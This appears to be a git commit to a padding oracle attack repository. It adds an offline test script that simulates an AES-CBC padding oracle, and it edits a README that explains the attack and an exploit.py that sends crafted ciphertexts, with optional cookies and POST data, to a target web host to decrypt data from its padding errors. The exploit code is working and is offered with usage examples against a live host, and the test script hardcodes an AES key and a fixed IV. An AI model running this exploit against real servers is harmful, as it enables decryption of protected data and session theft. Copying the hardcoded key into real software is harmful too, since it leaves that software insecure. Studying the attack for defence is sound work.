Add test script to launche the attack without target

Author: mpgn

README.md

@@ -4,6 +4,8 @@ An exploit for the [Padding Oracle Attack](https://en.wikipedia.org/wiki/Padding
 This is an implementation of this great article [Padding Oracle Attack](https://not.burntout.org/blog/Padding_Oracle_Attack/). Since the article is not very well formated and maybe unclear, I made an explanation in the readme. i advise you to read it if you want to understand the basics of the attack.
 This exploit allow block size of 8 or 16 this mean it can be use even if the cipher use AES or DES. You can find instructions to launch the attack [here](https://github.com/mpgn/Padding-Oracle-Attack#options).
 
+I also made a test file `test.py`, you don't need a target to use it :)
+
 ## Explanation
 
 I will explain in this part the cryptography behind the attack. To follow this you need to understand the [CBC mode cipher chainning](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_Block_Chaining_.28CBC.29) or [video link](https://www.youtube.com/watch?v=0D7OwYp6ZEc.) and the operator ⊕. This attack is also a [chosen-ciphertext attack](https://en.wikipedia.org/wiki/Chosen-ciphertext_attack).
@@ -78,7 +80,7 @@ D<sub>k</sub>(C'<sub>i</sub>) ⊕ C'<sub>i-1</sub> <br>
 = D<sub>k</sub>(C'<sub>i</sub>) ⊕ C'<sub>i-1</sub> ⊕ 00000022 ⊕ 000000YX <br>
 = P'<sub>i</sub> ⊕ 00000001 ⊕ 00000YX <br>
 
-* TThe oracle didn't give us a padding error and we know the byte X is good :
+* The oracle didn't give us a padding error and we know the byte X is good :
 
 ```
 If P'i ⊕ 000000YX == abcdef00 then:
@@ -95,13 +97,19 @@ etc etc for all the block. You can now launch the python script by reading the n
 
 ## Options
 
+The test file :
+
+```bash
+python test.py -m mysecretmessage
+```
+
 ```
 usage: exploit.py [-h] -c CIPHER -l LENGTH_BLOCK_CIPHER --host HOST -u
-                  URLTARGET --error ERROR [--iv IV] [--cookie COOKIE]
+                  URLTARGET --error ERROR [--cookie COOKIE]
                   [--method METHOD] [--post POST] [-v]
 ```
 Details required options:
-```
+```bash
 -h help
 -c cipher chain
 -l length of a block example: 8 or 16
@@ -112,15 +120,14 @@ Details required options:
              with DOM HTML   : "<h2>Padding Error</h2>"
 ```
 Optionnal options:
-```
---iv The IV of the cipher if you have it, otherwise the first block will not be decipher
+```bash
 --cookie Cookie parameter example: PHPSESSID=9nnvje7p90b507shfmb94d7
 --method Default GET methode but can se POST etc
 --post POST parameter if you need example 'user':'value', 'pass':'value'
 ```
 
 Example:
-```
+```bash
 python exploit.py -c E3B3D1120F999F4CEF945BA8B9326D7C3C8A8B02178E59AF506666542AB5EF44 -l 16 --host host.com -u /index.aspx?c= -v --error "Padding Error"
 ```
 

exploit.py

@@ -69,19 +69,16 @@ def block_padding(size_block, i):
 def hex_xor(s1,s2):
     return hexlify(''.join(chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(unhexlify(s1), cycle(unhexlify(s2)))))
 
-def run(cipher,size_block,host,url,cookie,method,post,iv,error):
+def run(cipher,size_block,host,url,cookie,method,post,error):
     cipher       = cipher.upper()
     found        = False
     valide_value = []
     result       = []
     len_block    = size_block*2
     cipher_block = split_len(cipher, len_block)
 
-    if iv != '':
-        cipher_block.insert(0,iv)
-
-    if len(cipher_block) == 1 and iv == '':
-        print "[-] Abort there is only one block but no IV"
+    if len(cipher_block) == 1:
+        print "[-] Abort there is only one block"
         sys.exit()  
     #for each cipher_block
     for block in reversed(range(1,len(cipher_block))):
@@ -129,6 +126,7 @@ def run(cipher,size_block,host,url,cookie,method,post,iv,error):
 
                         if args.verbose == True:
                             print ''
+                            print "[+] HTTP ", response.status, response.reason
                             print "[+] Block M_Byte : %s"% bk
                             print "[+] Block C_{i-1}: %s"% bp
                             print "[+] Block Padding: %s"% bc
@@ -144,7 +142,7 @@ def run(cipher,size_block,host,url,cookie,method,post,iv,error):
 
                         break 
             if found == False:
-                print "[-] Error decryption failed"
+                print "\n[-] Error decryption failed"
                 result.insert(0, ''.join(valide_value))
                 hex_r = ''.join(result)
                 print "[+] Partial Decrypted value (HEX):", hex_r.upper()
@@ -170,11 +168,10 @@ def run(cipher,size_block,host,url,cookie,method,post,iv,error):
     parser.add_argument("--host",                       required=True,              help='url example: /page=')
     parser.add_argument('-u', "--urltarget",            required=True,              help='url example: /page=')
     parser.add_argument('--error',                      required=True,              help='Error that oracle give us example: 404,500,200 OR in the dom example: "<h2>Padding Error<h2>"')
-    parser.add_argument('--iv',             help='IV of the CBC cipher mode',       default="")
     parser.add_argument('--cookie',         help='Cookie example: PHPSESSID=9nnvje7p90b507shfmb94d7',   default="")
     parser.add_argument('--method',         help='Type methode like POST GET default GET',              default="GET")
     parser.add_argument('--post',           help="POST data example: 'user':'value', 'pass':'value'",    default="")
     parser.add_argument('-v', "--verbose",  help='debug mode, you need a large screen', action="store_true")
     args = parser.parse_args()
 
-    run(args.cipher, args.length_block_cipher, args.host, args.urltarget, args.cookie, args.method, args.post, args.iv, args.error)
+    run(args.cipher, args.length_block_cipher, args.host, args.urltarget, args.cookie, args.method, args.post, args.error)

test.py

@@ -0,0 +1,192 @@
+#! /usr/bin/python
+
+'''
+    Padding Oracle Attack implementation without remote server
+    Check the readme for a full cryptographic explanation
+    Author: mpgn <[email protected]>
+    Date: 2016
+'''
+
+import argparse
+import re
+import binascii
+import sys
+import time
+from binascii import unhexlify, hexlify
+from itertools import cycle, izip
+from Crypto.Cipher import AES
+from Crypto import Random
+
+"""
+    AES-CBC
+    function encrypt, decrypt, pad, unpad)
+"""
+
+def pad(s):
+    return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)
+
+def unpad(s):
+    t = s.encode("hex")
+    exe = re.findall('..',t)
+    padding = int(exe[-1], 16)
+    exe = exe[::-1]
+
+    if padding == 0 or padding > 16:
+        return 0
+    
+    for i in range(padding):
+        if int(exe[i],16) != padding:
+            return 0
+    return s[:-ord(s[len(s)-1:])]
+
+def encrypt( msg, iv):
+    raw = pad(msg)
+    key = Random.new().read( AES.block_size )
+    cipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )
+    return cipher.encrypt( raw ), iv
+
+def decrypt( enc, iv ):
+    decipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )
+    return unpad(decipher.decrypt( enc ))
+
+
+
+''' the function you want change to adapte the result to your problem '''
+def test_validity(error):
+    if error != 404:
+        return 1
+    return 0
+
+
+def call_oracle(up_cipher, iv):
+    if decrypt( up_cipher, iv ) == 0:
+        return 404
+    return 200
+
+''' create custom block for the byte we search'''
+def block_search_byte(size_block, i, pos, l):
+    hex_char = hex(pos).split('0x')[1]
+    return "00"*(size_block-(i+1)) + ("0" if len(hex_char)%2 != 0 else '') + hex_char + ''.join(l)    
+
+''' create custom block for the padding'''
+def block_padding(size_block, i):
+    l = []
+    for t in range(0,i+1):
+        l.append(("0" if len(hex(i+1).split('0x')[1])%2 != 0 else '') + (hex(i+1).split('0x')[1]))
+    return "00"*(size_block-(i+1)) + ''.join(l)
+
+# the exploit don't need to touch this part
+# split the cipher in len of size_block
+def split_len(seq, length):
+    return [seq[i:i+length] for i in range(0, len(seq), length)]
+
+def hex_xor(s1,s2):
+    return hexlify(''.join(chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(unhexlify(s1), cycle(unhexlify(s2)))))
+
+def run(cipher,size_block):
+    cipher       = cipher.upper()
+    found        = False
+    valide_value = []
+    result       = []
+    len_block    = size_block*2
+    cipher_block = split_len(cipher, len_block)
+
+    if len(cipher_block) == 1:
+        print "[-] Abort there is only one block, i can't influence the IV. Tried a longer message"
+        sys.exit()
+
+    #for each cipher_block
+    for block in reversed(range(1,len(cipher_block))):
+        if len(cipher_block[block]) != len_block:
+            print "[-] Abort length block doesn't match the size_block"
+            break
+        print "[+] Search value block : ", block, "\n"
+        #for each byte of the block
+        for i in range(0,size_block):
+            # test each byte max 255
+            for ct_pos in range(0,256):
+                # 1 xor 1 = 0 or valide padding need to be checked
+                if ct_pos != i+1 or (len(valide_value) > 0  and int(valide_value[len(valide_value)-1],16) == ct_pos):
+
+                    bk = block_search_byte(size_block, i, ct_pos, valide_value) 
+                    bp = cipher_block[block-1]
+                    bc = block_padding(size_block, i) 
+
+                    tmp = hex_xor(bk,bp)
+                    cb  = hex_xor(tmp,bc).upper()
+
+                    up_cipher  = cb + cipher_block[block]
+                    #time.sleep(0.5)
+
+                    # we call the oracle, our god
+                    error = call_oracle(up_cipher.decode('hex'),iv)
+
+                    if args.verbose == True:
+                        exe = re.findall('..',cb)
+                        discover = ('').join(exe[size_block-i:size_block])
+                        current =  ('').join(exe[size_block-i-1:size_block-i])
+                        find_me =  ('').join(exe[:-i-1])
+
+                        sys.stdout.write("\r[+] Test [Byte %03i/256 - Block %d ]: \033[31m%s\033[33m%s\033[36m%s\033[0m" % (ct_pos, block, find_me, current, discover))
+                        sys.stdout.flush()
+
+                    if test_validity(error):
+
+                        found = True
+                       
+                        # data analyse and insert in rigth order
+                        value = re.findall('..',bk)
+                        valide_value.insert(0,value[size_block-(i+1)])
+
+                        if args.verbose == True:
+                            print ''
+                            print "[+] Block M_Byte : %s"% bk
+                            print "[+] Block C_{i-1}: %s"% bp
+                            print "[+] Block Padding: %s"% bc
+                            print ''
+
+                        bytes_found = ''.join(valide_value)
+                        if i == 0 and bytes_found.decode("hex") > hex(size_block):
+                            print "[-] Error decryption failed the padding is > 16"
+                            sys.exit()
+
+                        print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found
+                        print ''
+
+                        break 
+            if found == False:
+                print "\n[-] Error decryption failed"
+                result.insert(0, ''.join(valide_value))
+                hex_r = ''.join(result)
+                if len(hex_r) > 0:
+                    print "[+] Partial Decrypted value (HEX):", hex_r.upper()
+                    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
+                    print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+                sys.exit()
+            found = False
+
+        result.insert(0, ''.join(valide_value))
+        valide_value = []
+
+    print ''
+    hex_r = ''.join(result)
+    print "[+] Decrypted value (HEX):", hex_r.upper()
+    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
+    print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
+
+    return hex_r[0:-(padding*2)].decode("hex")
+
+if __name__ == '__main__':                           
+
+    parser = argparse.ArgumentParser(description='Exploit of Padding Oracle Attack')
+    parser.add_argument('-m', "--message",               required=True,  help='message to pown')
+    parser.add_argument('-v', "--verbose",  help='debug mode, you need a large screen', action="store_true")
+    args = parser.parse_args()
+
+    print "[+] Encrypt", args.message
+    cipher, iv = encrypt(args.message, "1234567812345678")
+    cipher_intercepted = cipher.encode("hex")
+    print "[+] %s ---> %s" % (args.message,  cipher_intercepted)
+    plaintext = decrypt(cipher, iv)
+
+    run(cipher_intercepted,16)